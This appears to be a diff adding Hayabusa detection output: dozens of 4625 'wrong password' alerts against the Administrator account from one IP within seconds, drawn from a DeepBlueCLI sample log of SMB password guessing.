+2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FqkbgrtBa5VFxPry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TMD57GtY15bfWBre | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e3lT9UgWr82PcAjf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SpwhTfFlvvccnI5N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 10CfKdnvWf4UVuME | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.539 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YYLMax3okIqntHM1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qk9TPAK51EdVORwY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aVKRUnNu2nGslW7P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJ2AYRLcMbMVixg6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Sl9ucxM2Nu3xjNq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AFeBGB6qA7OaYV7l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KLUEKG9CzQYsH3Vp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vVZ44YKdRYY59zaC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: umU8pDDZFvvUVsHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nn7rA0uRegtHgaF1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2dgiakCKweT4GUGD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.039 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kptipiLujNVePYfy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: plaXJ1rEGpU3SzV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I4pALF2luLfg36GC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZLO4cufbFcRhRy8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a845OfrFKxy31Yhg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QnPM7uhs8y4BaP6I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7fW5FzQ4jbWDJxXc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: huKy3ruTPAlx94pI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g78Kx7hkMuUGIoX1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: erSXtXvMi8Cg1PWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VaqXgO2US87zoXLl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QHEfAfFuAR2pX3LO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4Owk2elGaC5DOm1U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VXPynWzVNADN56a4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwfwZ0hXFaFwqymH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QYlZwLsvrsuqUZ4q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pvGrzr30eVl5TGhA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tqdJcHWbdGcIIHBr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YDt69bIJ1yI6PXLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtE2uMuOe8QPAKOj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BWQDlZDgFj9NmMhJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ncQiyLyHCXr8knGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XjVmLfmcPMYbmdin | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gU2HjzjDxHsnvENI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cUPn5CEz2LtwRwvZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCz069oBFXqpshbU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dzhc9PVRVP69tshD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ejA3ZNfKWEs8zAMX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U5egiL2PGOrYCHv5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YYhIM3zla6KcbKbM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WjyQJnVBO4iC9Tkw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g6Tpp8TRa2nRxHzo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DyLvo5Bn2HzyANdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NaXNThuZDGqJ7oCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 42Sb7p19cQsEV30b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: An6629wgflzSgqY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iO7JktEihqddmEtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nG97BFOgKxnZaqi4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SH2D24c6nRGDL4Oe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uiu2yfaM2JQQZoLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YQx9PG8DtR2tMjvS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OoAWryajKhLD7RyY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PgewSeaVugP1TXss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sPMCPdCAnz4upz8X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dUbV6xnGeBWE8Dif | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIJ9mZczFO1GKItV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wW0vxE4o68L70Sra | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: upOn9DzB1yWtntyX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m9uGgocAVReiJWDm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qm9Jf1fles2HOb3g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ev5eTWdf3CskOMuh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QoiMO6sSLOm4fOD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xDjvMsa2IgR9KO7l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SR7gVjxHZDYeK7pJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4jzGAepr7JeNKuuk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H9baxEeRCWjx6Fzr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uy7aTt0B4ErguacA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nvKcLrUXqu2vTKO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
